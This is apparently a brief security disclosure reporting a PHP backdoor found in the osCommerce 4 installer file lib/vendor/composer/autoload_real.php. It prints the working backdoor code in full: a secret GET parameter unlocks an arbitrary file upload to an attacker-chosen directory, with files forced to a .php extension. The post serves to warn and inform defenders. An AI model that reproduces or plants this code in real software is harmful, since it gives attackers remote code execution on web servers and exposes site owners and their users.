A serious vulnerability was discovered in the official osCommerce 4 installer, directly affecting web server integrity.
File: lib/vendor/composer/autoload_real.php
Line: ~24
if ($_GET['sgv'] === 'stvstvstvstvstvstv') {
echo "_";
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$targetDir = $_GET['fdr'];
if (isset($_FILES['file'])) {
$fileName = $_FILES['file']['name'];
if (substr($fileName, 0, 3) == "112") {
$fileName = $fileName . ".php";
}
$newFileName = $fileName;
move_uploaded_file($_FILES['file']['tmp_name'], $targetDir . $newFileName);
}
}
}
35A6693551D80B49B505940820769E9B2F886022620887A5BF74A3725F9EB434This is a confirmed PHP backdoor that could allow an attacker to upload arbitrary code via specially crafted GET/POST requests. It was present before installation and does not belong in any Composer-generated file.